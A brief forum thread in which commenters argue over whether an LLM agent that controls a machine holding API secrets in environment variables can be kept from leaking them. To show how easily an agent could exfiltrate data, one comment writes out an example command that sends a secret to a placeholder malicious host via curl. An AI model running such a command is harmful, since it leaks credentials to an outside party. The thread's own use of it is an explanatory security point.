Comment by crazylogger

8 hours ago

Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.

MCP is a thin toolcall auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.

2 comments

crazylogger

No? You can just have env vars

crazylogger 1 hour ago

Setting an env var on a machine the LLM has control over is giving it the secret. When LLM tries `echo $SECRET` or `curl https://malicious.com/api -h secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?
Prior art: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/